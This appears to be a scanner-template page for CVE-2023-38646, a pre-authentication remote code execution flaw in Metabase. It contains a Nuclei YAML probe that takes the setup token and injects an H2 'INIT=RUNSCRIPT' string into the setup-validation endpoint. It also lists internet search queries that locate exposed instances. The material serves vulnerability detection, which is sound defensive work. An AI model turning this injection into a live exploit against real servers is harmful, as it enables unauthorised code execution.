Metabase < 0.46.6.1 - Remote Code Execution

ID: CVE-2023-38646

Severity: critical

Author: rootxharsh,iamnoooob,pdresearch

Tags: cve2023,cve,metabase,oss,rce

Description

Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server’s privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

YAML Source

id: CVE-2023-38646

info:
  name: Metabase < 0.46.6.1 - Remote Code Execution
  author: rootxharsh,iamnoooob,pdresearch
  severity: critical
  description: |
    Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade Metabase to version 0.46.6.1 or later to mitigate this vulnerability.
  reference:
    - https://www.metabase.com/blog/security-advisory
    - https://github.com/metabase/metabase/releases/tag/v0.46.6.1
    - https://mp.weixin.qq.com/s/ATFwFl-D8k9QfQfzKjZFDg
    - https://news.ycombinator.com/item?id=36812256
    - https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
    - https://gist.github.com/testanull/a7beb2777bbf550f3cf533d2794477fe
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-38646
    epss-score: 0.91302
    epss-percentile: 0.98865
    cpe: cpe:2.3:a:metabase:metabase:*:*:*:*:-:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: metabase
    product: metabase
    shodan-query:
      - http.title:"Metabase"
      - http.title:"metabase"
    fofa-query:
      - app="Metabase"
      - title="metabase"
      - app="metabase"
    google-query: intitle:"metabase"
  tags: cve2023,cve,metabase,oss,rce
variables:
  file: "./plugins/vertica.metabase-driver.jar"

http:
  - raw:
      - |
        GET /api/session/properties HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /api/setup/validate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "token":"{{token}}",
           "details":{
              "details":{
                 "subprotocol":"h2",
                 "classname":"org.h2.Driver",
                 "advanced-options":true,
                 "subname":"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\;"
              },
              "name":"{{randstr}}",
              "engine":"postgres"
           }
        }

    extractors:
      - type: json
        part: body_1
        name: token
        json:
          - .["setup-token"]
        internal: true
    matchers:
      - type: dsl
        dsl:
          - contains_any(body_2, "Syntax error in SQL statement","NoSuchFileException")
          - status_code_2 == 400
        condition: and
# digest: 4a0a00473045022100eac2358853f80516c6febaba3f5d993f773304ddf6b5c8c93434922b36b4351002207699928bc0a3f74bb788b464d00765cdb49e86584c1d1878290bed3f45b6535d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-38646.yaml"

View on Github